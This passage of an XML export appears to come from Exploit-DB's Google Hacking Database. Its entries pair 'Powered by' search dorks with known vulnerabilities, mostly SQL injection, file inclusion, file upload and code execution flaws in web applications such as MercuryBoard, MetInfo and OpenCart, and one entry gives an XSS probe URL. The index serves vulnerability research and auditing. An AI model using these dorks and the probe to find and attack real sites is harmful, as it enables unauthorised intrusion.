</entry>
<entry>
<id>1710</id>
<link>https://www.exploit-db.com/ghdb/1710</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Md-Pro&quot;</shortDescription>
<textualDescription>Md-Pro 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability - CVE: 2007-3938: https://www.exploit-db.com/exploits/4199</textualDescription>
<query>&quot;Powered by Md-Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Md-Pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/4199</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1093</id>
<link>https://www.exploit-db.com/ghdb/1093</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MD-Pro&quot; | &quot;made with MD-Pro&quot;</shortDescription>
<textualDescription>MAXdev MD-Pro 1.0.73 (possibly prior versions) remote code execution/ cross site scripting / path disclosure. This search does not find vulnerable versions.software:site: http://www.maxdev.com/description: http://www.maxdev.com/AboutMD.phtmloriginal advisory: http://rgod.altervista.org/maxdev1073.html</textualDescription>
<query>&quot;Powered by MD-Pro&quot; | &quot;made with MD-Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+MD-Pro%22+%7C+%22made+with+MD-Pro%22&amp;start=0&amp;start=0</querystring>
<edb></edb>
<date>2005-09-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3451</id>
<link>https://www.exploit-db.com/ghdb/3451</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MDForum&quot;</shortDescription>
<textualDescription>MDForum 2.0.1 (PNSVlang) Remote Code Execution - CVE: 2006-6869: https://www.exploit-db.com/exploits/3057</textualDescription>
<query>&quot;Powered by MDForum&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+MDForum%22</querystring>
<edb>https://www.exploit-db.com/exploits/3057</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>530</id>
<link>https://www.exploit-db.com/ghdb/530</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Megabook *&quot; inurl:guestbook.cgi</shortDescription>
<textualDescription>MegaBook is a web-based guestbook that is intended to run on Unix and Linux variants. MegaBook is prone to multiple HTML injection vulnerabilities. http://www.securityfocus.com/bid/8065</textualDescription>
<query>&quot;Powered by Megabook *&quot; inurl:guestbook.cgi</query>
<querystring>https://www.google.com/search?hl=es&amp;q=%22Powered+by+Megabook+*%22+inurl%3Aguestbook.cgi+%0D%0A&amp;btnG=B%FAsqueda</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>864</id>
<link>https://www.exploit-db.com/ghdb/864</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MercuryBoard [v1&quot;</shortDescription>
<textualDescription>Exploit for MercuryBoard:http://www.securityfocus.com/archive/1/389881/2005-02-06/2005-02-12/0Enter the following search:&quot;Powered by MercuryBoard [v1&quot;And the exploit does work!</textualDescription>
<query>&quot;Powered by MercuryBoard [v1&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Powered+by+MercuryBoard+%5Bv1%22</querystring>
<edb></edb>
<date>2005-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3484</id>
<link>https://www.exploit-db.com/ghdb/3484</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MercuryBoard&quot;</shortDescription>
<textualDescription>MercuryBoard 1.1.4 (User-Agent) Remote SQL Injection: https://www.exploit-db.com/exploits/2247</textualDescription>
<query>&quot;Powered by MercuryBoard&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+MercuryBoard%22</querystring>
<edb>https://www.exploit-db.com/exploits/2247</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3551</id>
<link>https://www.exploit-db.com/ghdb/3551</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MercuryBoard&quot;</shortDescription>
<textualDescription>MercuryBoard 1.1.5 (login.php) Remote Blind SQL Injection - CVE: 2008-6632:
https://www.exploit-db.com/exploits/5653</textualDescription>
<query>&quot;Powered by MercuryBoard&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+MercuryBoard%22</querystring>
<edb>https://www.exploit-db.com/exploits/5653</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2962</id>
<link>https://www.exploit-db.com/ghdb/2962</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MetInfo 2.0&quot;</shortDescription>
<textualDescription>MetInfo 2.0 PHP Code Injection Vulnerability: https://www.exploit-db.com/exploits/15360</textualDescription>
<query>&quot;Powered by MetInfo 2.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by++MetInfo++2.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/15360</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2961</id>
<link>https://www.exploit-db.com/ghdb/2961</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MetInfo 3.0&quot;</shortDescription>
<textualDescription>MetInfo 3.0 PHP Code Injection Vulnerability: https://www.exploit-db.com/exploits/15361</textualDescription>
<query>&quot;Powered by MetInfo 3.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by++MetInfo+3.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/15361</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2178</id>
<link>https://www.exploit-db.com/ghdb/2178</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Minerva&quot;</shortDescription>
<textualDescription>Minerva 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability - CVE: 2006-5077: https://www.exploit-db.com/exploits/2429</textualDescription>
<query>&quot;Powered by Minerva&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Minerva%22</querystring>
<edb>https://www.exploit-db.com/exploits/2429</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1406</id>
<link>https://www.exploit-db.com/ghdb/1406</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by minibb forum software&quot;</shortDescription>
<textualDescription>This dork is for minibb forum software arbitrary remote inclusion. this is about the unset() issue found by S. Esser: http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this c codes to calculate hashes if you wanna test the unset() vuln on some other app: http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=3944</textualDescription>
<query>&quot;powered by minibb forum software&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22powered+by+minibb+forum+software%22</querystring>
<edb></edb>
<date>2006-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>700</id>
<link>https://www.exploit-db.com/ghdb/700</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by minibb&quot; -site:www.minibb.net -intext:1.7f</shortDescription>
<textualDescription>miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688</textualDescription>
<query>&quot;powered by minibb&quot; -site:www.minibb.net -intext:1.7f</query>
<querystring>https://www.google.com/search?q=%22powered+by+minibb%22+%2Dsite%3Awww%2Eminibb%2Enet+%2Dintext%3A1%2E7f</querystring>
<edb></edb>
<date>2004-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1640</id>
<link>https://www.exploit-db.com/ghdb/1640</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by mlffat&quot;</shortDescription>
<textualDescription>Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8674</textualDescription>
<query>&quot;Powered by mlffat&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+mlffat%22</querystring>
<edb>https://www.exploit-db.com/exploits/8674</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3216</id>
<link>https://www.exploit-db.com/ghdb/3216</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MobPartner&quot; inurl:&quot;chat.php&quot;</shortDescription>
<textualDescription>MobPartner Chat Multiple Sql Injection Vulnerabilities: https://www.exploit-db.com/exploits/11321</textualDescription>
<query>&quot;Powered by MobPartner&quot; inurl:&quot;chat.php&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+MobPartner%22+inurl:%22chat.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/11321</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2822</id>
<link>https://www.exploit-db.com/ghdb/2822</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by MODx&quot;</shortDescription>
<textualDescription>MODx CMS 0.9.2.1 (FCKeditor) Remote File Include Vulnerability - CVE: 2006-5730: https://www.exploit-db.com/exploits/2706/</textualDescription>
<query>&quot;powered by MODx&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+MODx%22</querystring>
<edb>https://www.exploit-db.com/exploits/2706</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3453</id>
<link>https://www.exploit-db.com/ghdb/3453</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by mojoPortal&quot;</shortDescription>
<textualDescription>mojoportal Multiple Remote Vulnerabilities - CVE: 2010-3602: https://www.exploit-db.com/exploits/15018</textualDescription>
<query>&quot;Powered by mojoPortal&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+mojoPortal%22</querystring>
<edb>https://www.exploit-db.com/exploits/15018</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>624</id>
<link>https://www.exploit-db.com/ghdb/624</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by My Blog&quot; intext:&quot;FuzzyMonkey.org&quot;</shortDescription>
<textualDescription>FuzzyMonkey My Blog is vulnerable to multiple input validation vulnerabilities. These issues are caused by a failure to validate and filter user-supplied strings before including them in dynamic Web page content.An attacker could leverage these issues to carry out cross-site scripting attacks against unsuspecting users, facilitating theft of cookie-based authentication credentials as well as other attacks.vulnerable FuzzyMonkey My Blog 1.15FuzzyMonkey My Blog 1.16FuzzyMonkey My Blog 1.17FuzzyMonkey My Blog 1.18FuzzyMonkey My Blog 1.19FuzzyMonkey My Blog 1.20not vulnerable FuzzyMonkey My Blog 1.21 They also have several other scripts, which may or may not be vulnerable. But remember Murphy's law also applies to software writers.# My Photo Gallery (picture and file sharing software)# My Calendar (quick and easy web calendar)# My Voting Script# My Guestbookhttp://www.securityfocus.com/bid/11325</textualDescription>
<query>&quot;Powered by My Blog&quot; intext:&quot;FuzzyMonkey.org&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Powered+by+My+Blog%22+intext%3A%22FuzzyMonkey.org%22</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1474</id>
<link>https://www.exploit-db.com/ghdb/1474</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by My PHP Indexer 1.0&quot;</shortDescription>
<textualDescription>My PHP Indexer 1.0 (index.php) Local File Download Vulnerability - CVE: 2008-6183: https://www.exploit-db.com/exploits/6740</textualDescription>
<query>&quot;Powered by My PHP Indexer 1.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+My+PHP+Indexer+1.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/6740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2588</id>
<link>https://www.exploit-db.com/ghdb/2588</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by myBusinessAdmin and Red Cow Technologies, Inc.&quot;</shortDescription>
<textualDescription>myBusinessAdmin (content.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11327</textualDescription>
<query>&quot;Powered by myBusinessAdmin and Red Cow Technologies, Inc.&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+myBusinessAdmin+and+Red+Cow+Technologies,+Inc.%22</querystring>
<edb>https://www.exploit-db.com/exploits/11327</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2243</id>
<link>https://www.exploit-db.com/ghdb/2243</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by MySpace Content Zone&quot;</shortDescription>
<textualDescription>MySpace Content Zone 3.x Remote File Upload Vulnerability - CVE: 2007-6668: https://www.exploit-db.com/exploits/4741</textualDescription>
<query>&quot;Powered by MySpace Content Zone&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+MySpace+Content+Zone%22</querystring>
<edb>https://www.exploit-db.com/exploits/4741</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2891</id>
<link>https://www.exploit-db.com/ghdb/2891</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by myUPB&quot;</shortDescription>
<textualDescription>myUPB v2.2.6 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/13957</textualDescription>
<query>&quot;Powered by myUPB&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+myUPB%22</querystring>
<edb>https://www.exploit-db.com/exploits/13957</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1912</id>
<link>https://www.exploit-db.com/ghdb/1912</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Nabernet&quot;</shortDescription>
<textualDescription>Nabernet (articles.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11482</textualDescription>
<query>&quot;powered by Nabernet&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Nabernet%22</querystring>
<edb>https://www.exploit-db.com/exploits/11482</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3062</id>
<link>https://www.exploit-db.com/ghdb/3062</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by NovaBoard v1.0.0&quot;</shortDescription>
<textualDescription>NovaBoard 1.0.0 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8063</textualDescription>
<query>&quot;Powered by NovaBoard v1.0.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+NovaBoard+v1.0.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/8063</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2402</id>
<link>https://www.exploit-db.com/ghdb/2402</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by NovaBoard v1.1.2&quot;</shortDescription>
<textualDescription>NovaBoard v1.1.2 SQL Injection Vulnerability - CVE: 2010-0608: https://www.exploit-db.com/exploits/11278</textualDescription>
<query>&quot;Powered by NovaBoard v1.1.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+NovaBoard+v1.1.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/11278</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3247</id>
<link>https://www.exploit-db.com/ghdb/3247</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Nukedit&quot;</shortDescription>
<textualDescription>Nukedit 4.9.x Remote Create Admin Exploit - CVE: 2008-5582: https://www.exploit-db.com/exploits/5192</textualDescription>
<query>&quot;Powered by Nukedit&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Nukedit%22</querystring>
<edb>https://www.exploit-db.com/exploits/5192</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1866</id>
<link>https://www.exploit-db.com/ghdb/1866</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Nukedit&quot;</shortDescription>
<textualDescription>Nukedit 4.9.8 Remote Database Disclosure Vulnerability - CVE: 2008-5773: https://www.exploit-db.com/exploits/7491</textualDescription>
<query>&quot;Powered by Nukedit&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Nukedit%22</querystring>
<edb>https://www.exploit-db.com/exploits/7491</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1723</id>
<link>https://www.exploit-db.com/ghdb/1723</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral&quot;</shortDescription>
<textualDescription>nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability - CVE: 2008-3405: https://www.exploit-db.com/exploits/6164</textualDescription>
<query>&quot;Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+nzFotolog+v0.4.1+%C3%82%C2%A9+2005-2006+Ricardo+Amaral%22</querystring>
<edb>https://www.exploit-db.com/exploits/6164</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>621</id>
<link>https://www.exploit-db.com/ghdb/621</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ocPortal&quot; -demo -ocportal.com</shortDescription>
<textualDescription>Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run arbitrary server side script code on a vulnerable computer with the privileges of the web server process. This may potentially result in a compromise of the vulnerable computer as well as other attacks.http://www.securityfocus.com/bid/11368</textualDescription>
<query>&quot;Powered by ocPortal&quot; -demo -ocportal.com</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ocPortal%22+-demo+-ocportal.com+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1819</id>
<link>https://www.exploit-db.com/ghdb/1819</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by OnePound&quot; </shortDescription>
<textualDescription>onepound shop 1.x products.php SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9138</textualDescription>
<query>&quot;Powered by OnePound&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+OnePound%22</querystring>
<edb>https://www.exploit-db.com/exploits/9138</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3282</id>
<link>https://www.exploit-db.com/ghdb/3282</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Online Grades&quot; </shortDescription>
<textualDescription>Online Grades &amp; Attendance 3.2.6 Multiple Local File Inclusion Vulns - CVE: 2009-2037: https://www.exploit-db.com/exploits/8853</textualDescription>
<query>&quot;Powered by Online Grades&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Online+Grades%22</querystring>
<edb>https://www.exploit-db.com/exploits/8853</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3325</id>
<link>https://www.exploit-db.com/ghdb/3325</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Online Grades&quot; </shortDescription>
<textualDescription>Online Grades &amp; Attendance 3.2.6 Multiple SQL Injection Vulnerabilities - CVE: 2009-2598: https://www.exploit-db.com/exploits/8844</textualDescription>
<query>&quot;Powered by Online Grades&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Online+Grades%22</querystring>
<edb>https://www.exploit-db.com/exploits/8844</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3516</id>
<link>https://www.exploit-db.com/ghdb/3516</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Online Grades&quot; </shortDescription>
<textualDescription>Online Grades &amp; Attendance 3.2.6 Credentials Changer SQL injection: https://www.exploit-db.com/exploits/8843</textualDescription>
<query>&quot;Powered by Online Grades&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Online+Grades%22</querystring>
<edb>https://www.exploit-db.com/exploits/8843</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3574</id>
<link>https://www.exploit-db.com/ghdb/3574</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Online Grades&quot;</shortDescription>
<textualDescription>Online Grades &amp; Attendance 3.2.6 Blind SQL Injection - CVE: 2009-2598:
https://www.exploit-db.com/exploits/8854</textualDescription>
<query>&quot;Powered by Online Grades&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Online+Grades%22</querystring>
<edb>https://www.exploit-db.com/exploits/8854</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2952</id>
<link>https://www.exploit-db.com/ghdb/2952</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By OpenCart&quot;</shortDescription>
<textualDescription>Opencart 1.4.9.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/15050</textualDescription>
<query>&quot;Powered By OpenCart&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+OpenCart%22</querystring>
<edb>https://www.exploit-db.com/exploits/15050</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2239</id>
<link>https://www.exploit-db.com/ghdb/2239</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Orca Interactive Forum Script&quot;</shortDescription>
<textualDescription>Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability - CVE: 2008-5167: https://www.exploit-db.com/exploits/5955</textualDescription>
<query>&quot;Powered by Orca Interactive Forum Script&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+Orca+Interactive+Forum+Script%22</querystring>
<edb>https://www.exploit-db.com/exploits/5955</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2825</id>
<link>https://www.exploit-db.com/ghdb/2825</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by osCMax v2.0&quot; , &quot;Copyright @&quot; &quot;RahnemaCo.com&quot;</shortDescription>
<textualDescription>osCMax 2.0 (fckeditor) Remote File Upload: https://www.exploit-db.com/exploits/11771</textualDescription>
<query>&quot;Powered by osCMax v2.0&quot; , &quot;Copyright @&quot; &quot;RahnemaCo.com&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+osCMax+v2.0%22+%2C+%22Copyright+@%22+%22RahnemaCo.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/11771</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2114</id>
<link>https://www.exploit-db.com/ghdb/2114</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Ovidentia&quot;</shortDescription>
<textualDescription>Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability - CVE: 2008-3918: https://www.exploit-db.com/exploits/6232</textualDescription>
<query>&quot;Powered by Ovidentia&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Ovidentia%22</querystring>
<edb>https://www.exploit-db.com/exploits/6232</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3650</id>
<link>https://www.exploit-db.com/ghdb/3650</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By PageAdmin CMS Free Version&quot;</shortDescription>
<textualDescription>Author: Sun Army XSS: /include/search.aspx?keycode=&quot;&gt;xss ByTakpar&amp;type=1&amp;language=en</textualDescription>
<query>&quot;Powered By PageAdmin CMS Free Version&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered+By+PageAdmin+CMS+Free+Version&quot;</querystring>
<edb></edb>
<date>2010-12-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1659</id>
<link>https://www.exploit-db.com/ghdb/1659</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Pagetool&quot;</shortDescription>
<textualDescription>Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability - CVE: 2007-3402: https://www.exploit-db.com/exploits/4107</textualDescription>
<query>&quot;powered by Pagetool&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Pagetool%22</querystring>
<edb>https://www.exploit-db.com/exploits/4107</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1676</id>
<link>https://www.exploit-db.com/ghdb/1676</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ParsBlogger&quot;</shortDescription>
<textualDescription>ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability - CVE: 2008-5637: https://www.exploit-db.com/exploits/7239</textualDescription>
<query>&quot;Powered by ParsBlogger&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ParsBlogger%22</querystring>
<edb>https://www.exploit-db.com/exploits/7239</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1646</id>
<link>https://www.exploit-db.com/ghdb/1646</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by PassWiki&quot;</shortDescription>
<textualDescription>PassWiki 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability - CVE: 2008-6423: https://www.exploit-db.com/exploits/5704</textualDescription>
<query>&quot;powered by PassWiki&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+PassWiki%22</querystring>
<edb>https://www.exploit-db.com/exploits/5704</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3556</id>
<link>https://www.exploit-db.com/ghdb/3556</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by PCPIN.com&quot;</shortDescription>
<textualDescription>PCPIN Chat 5.0.4 (login/language) Remote Code Execution:
https://www.exploit-db.com/exploits/1697</textualDescription>
<query>&quot;powered by PCPIN.com&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+PCPIN.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/1697</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2531</id>
<link>https://www.exploit-db.com/ghdb/2531</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PG Online Training Solution - learning management system&quot;</shortDescription>
<textualDescription>Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability - CVE: 2008-4709: https://www.exploit-db.com/exploits/6613</textualDescription>
<query>&quot;Powered by PG Online Training Solution - learning management system&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PG+Online+Training+Solution+-+learning+management+system%22</querystring>
<edb>https://www.exploit-db.com/exploits/6613</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1485</id>
<link>https://www.exploit-db.com/ghdb/1485</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PG Real Estate Solution - real estate web site design&quot;</shortDescription>
<textualDescription>PG Real Estate (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5306: https://www.exploit-db.com/exploits/7200</textualDescription>
<query>&quot;Powered by PG Real Estate Solution - real estate web site design&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PG+Real+Estate+Solution+-+real+estate+web+site+design%22</querystring>
<edb>https://www.exploit-db.com/exploits/7200</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1486</id>
<link>https://www.exploit-db.com/ghdb/1486</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by PG Roomate Finder Solution - roommate estate web site design&quot;</shortDescription>
<textualDescription>PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5307: https://www.exploit-db.com/exploits/7201</textualDescription>
<query>&quot;Powered by PG Roomate Finder Solution - roommate estate web site design&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+PG+Roomate+Finder+Solution+-+roommate+estate+web+site+design%22</querystring>
<edb>https://www.exploit-db.com/exploits/7201</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1990</id>
<link>https://www.exploit-db.com/ghdb/1990</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Philboard&quot; inurl:&quot;philboard_forum.asp&quot;</shortDescription>
<textualDescription>Philboard 1.14 (philboard_forum.asp) SQL Injection Vulnerability - CVE: 2007-0920: https://www.exploit-db.com/exploits/3295</textualDescription>
<query>&quot;Powered by Philboard&quot; inurl:&quot;philboard_forum.asp&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Philboard%22+inurl:%22philboard_forum.asp%22</querystring>
<edb>https://www.exploit-db.com/exploits/3295</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1948</id>
<link>https://www.exploit-db.com/ghdb/1948</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Photo-Graffix Flash Image Gallery&quot;</shortDescription>
<textualDescription>Photo Graffix 3.4 Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8372</textualDescription>
<query>&quot;powered by Photo-Graffix Flash Image Gallery&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Photo-Graffix+Flash+Image+Gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/8372</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2959</id>
<link>https://www.exploit-db.com/ghdb/2959</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by photokorn&quot;</shortDescription>
<textualDescription>photokron 1.7 (update script) Remote Database Disclosure - CVE: 2008-0297: https://www.exploit-db.com/exploits/4897/</textualDescription>
<query>&quot;Powered by photokorn&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+photokorn%22</querystring>
